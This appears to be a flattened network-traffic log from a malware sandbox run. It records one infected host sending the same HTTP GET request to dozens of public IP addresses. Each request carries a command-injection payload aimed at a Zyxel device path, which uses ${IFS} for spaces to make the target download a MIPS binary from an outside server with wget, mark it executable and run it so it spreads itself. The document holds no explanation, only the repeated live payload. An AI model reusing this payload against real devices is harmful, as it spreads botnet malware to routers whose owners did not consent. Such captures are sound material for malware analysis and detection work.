                                                      Feb 2, 2024 06:35:54.664911985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4902192.168.2.145426497.52.5.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664953947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4903192.168.2.1433388134.131.80.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665000916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4904192.168.2.1446418167.77.184.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665044069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4905192.168.2.1450198122.103.221.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665081978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4906192.168.2.1441218174.44.119.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665127039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4907192.168.2.1455068156.150.158.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665159941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4908192.168.2.1451402131.209.43.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665188074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4909192.168.2.1456534108.194.123.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665236950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4910192.168.2.1447404212.179.152.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665271044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4911192.168.2.146013080.5.26.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665324926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4912192.168.2.1434434160.157.154.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665359974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4913192.168.2.1447758108.90.83.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.665404081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4914192.168.2.1459092105.77.236.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.667357922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4915192.168.2.1456858117.165.169.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669433117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4916192.168.2.1441786181.254.22.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669470072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4917192.168.2.1438784139.239.98.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669492006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4918192.168.2.144443479.45.207.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669539928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4919192.168.2.143377434.181.28.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669589996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4920192.168.2.144436057.46.198.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669630051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4921192.168.2.144120697.8.160.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669660091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4922192.168.2.1437286216.244.61.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669698000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4923192.168.2.1442318139.146.167.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669714928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4924192.168.2.1457628178.146.220.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669831991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4925192.168.2.144224659.212.6.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669863939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4926192.168.2.1451080163.195.182.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669898033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4927192.168.2.1445460119.108.70.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669915915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4928192.168.2.1442112189.58.137.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669955969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4929192.168.2.145420096.198.167.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.669997931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4930192.168.2.144226451.136.245.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.670030117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4931192.168.2.1442946190.170.64.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.670056105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4932192.168.2.1455230218.154.169.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.670079947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4933192.168.2.143713854.1.117.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.670125008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4934192.168.2.143945681.221.68.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.670180082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4935192.168.2.1450548163.244.80.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.670205116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4936192.168.2.145645484.18.35.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677438021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4937192.168.2.1434092173.84.82.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677557945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4938192.168.2.143552437.0.131.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677592993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4939192.168.2.145174891.137.29.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677640915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4940192.168.2.1459238201.13.5.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677685022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4941192.168.2.1449808138.101.210.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677752972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4942192.168.2.14406565.138.14.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677789927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4943192.168.2.144710665.121.249.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677831888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4944192.168.2.1444558119.194.107.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677865982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4945192.168.2.1440034125.45.196.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677897930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4946192.168.2.1445180203.221.61.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677934885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4947192.168.2.1438188108.188.39.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.677968979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4948192.168.2.1454830211.149.242.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678010941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4949192.168.2.1451692126.84.28.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678056955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4950192.168.2.1449666202.212.58.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678109884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4951192.168.2.145094463.54.220.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678148985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4952192.168.2.1436374114.149.181.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678206921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4953192.168.2.145929666.185.194.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678230047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4954192.168.2.1442778101.150.189.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678281069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4955192.168.2.1447390107.96.35.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678330898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4956192.168.2.1432960185.105.176.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678364992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4957192.168.2.145933446.48.68.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678421021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4958192.168.2.1460514136.213.229.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678436041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4959192.168.2.1447662208.48.135.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678479910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4960192.168.2.1456186129.24.230.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678508997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4961192.168.2.1446554165.181.254.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678553104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4962192.168.2.1446770131.176.59.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678599119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4963192.168.2.144774467.222.227.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678644896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4964192.168.2.1442952194.148.85.129443
                                                      TimestampBytes transferredDirectionData
